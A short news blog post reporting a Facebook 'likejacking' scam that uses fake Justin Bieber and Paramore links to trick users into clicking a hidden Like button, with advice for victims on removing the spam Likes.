Earlier this week, we reported on a new Facebook clickjacking scheme that takes advantage of the service’s “Like” buttons; today a variation of that attack is starting to appear, this time using Justin Bieber as bait.
While the baited links in the last attack were focused on sensational, if generic, titles like, “LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE,” the new vector takes advantage of the popularity of YouTube star Bieber, as well as Paramore lead singer Hayley Williams.
The targeted links display text that says either, “Paramore n-a-k-ed photo leaked” or “Justin Biebers Phone Number Leaked!” In the case of the Paramore clickjack, users are then taken to a page that says “Click here to continue if you are 18 years of age of above.” Clicking anywhere on the site then launches an invisible iframe which contains a Facebook Like button, thus spreading the link to more and more users.
The Justin Bieber vector is actually even more clever. First, it takes you to a page that says “Click here to continue” — this is the invisible Facebook Like button — however, after clicking on the page, users are then given what is purported to be Bieber’s phone number and address.
Unlike the previous attack, it doesn’t appear that this clickjacking — or “likejacking” as some are calling it — attack has any malware or worms embedded on the serving websites. Still, if you or someone you know falls victim to these fake links, you should remove the links from your “Likes and Interests” section on your Facebook profile page.
As far as clickjacking techniques are concerned, the use of the Facebook Like button iframe is one of the more clever methods we’ve seen. We hope Facebook can address this issue and better control how the controls work, lest we all become inundated with spammy “Likes” across our news feeds.
0 comments:
Post a Comment